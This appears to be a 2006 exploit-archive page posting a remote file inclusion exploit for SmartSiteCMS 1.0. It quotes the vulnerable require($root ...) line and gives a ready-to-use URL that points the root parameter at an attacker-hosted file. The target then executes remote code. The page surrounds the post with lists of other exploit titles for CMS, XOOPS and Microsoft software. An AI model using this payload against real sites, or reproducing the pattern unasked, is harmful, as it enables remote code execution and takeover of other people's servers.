exploits , vulnerabilities , articles , SmartSiteCMS 1.0 (root) Remote File Inclusion Vulnerability

2007-06-09 e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit
2007-05-22 TutorialCMS <= 1.01 Authentication Bypass Vulnerability
2007-04-16 audioCMS arash 0.1.4 (arashlib_dir) Remote File Inclusion Vulnerabilities
2007-04-14 bloofoxCMS 0.2.2 Cross Site Scripting
2007-04-14 Frogss CMS <= 0.7 Remote SQL Injection Exploit
2007-04-10 SimpCMS Light <= 04.10.2007 (site) Remote File Inclusion Vulnerability

2006-06-20

SmartSiteCMS 1.0 (root) Remote File Inclusion Vulnerability

Rated as : High Risk

# smartsite cms <= 1.0 Remote File Inclusion
#
# Contact : irc.gigachat.net #ir4dex
# Risk : High
# Class : Remote
# Script : smartsite cms
# Version : not specified
# URL: http://www.smartsitecms.net/
---------------------------------------------------------------------

Vulnerable code :

require($root . "include/inc_foot.php");

---------------------------------------------------------------------

http://www.site.com/[smartsitecmspath]/include/inc.foot.php?root=http://[attacker]

by Archit3ct and IR4DEX GROUP

Greetz: Darkfire
securitydot.net - 2006-06-20

Exploits - newest 10 RSS | More

2007-06-15 56560 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33678 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41848 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28935 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19446 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16449 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19107 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16316 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33219 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16975 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit